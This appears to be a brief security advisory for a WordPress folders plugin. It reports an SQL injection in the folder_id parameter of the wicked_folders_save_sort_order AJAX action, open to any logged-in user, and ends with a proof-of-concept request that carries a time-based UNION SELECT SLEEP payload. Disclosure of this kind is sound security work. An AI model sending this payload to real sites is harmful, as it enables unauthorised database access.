The plugin does not sanitise and escape the folder_id parameter before using it in a SQL statement in the wicked_folders_save_sort_order AJAX action, available to any authenticated user. leading to an SQL injection
As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=wicked_folders_save_sort_order&folder_id=-1%20UNION%20(SELECT%2042,42,42%20FROM%20(SELECT(SLEEP(5)))b)%20--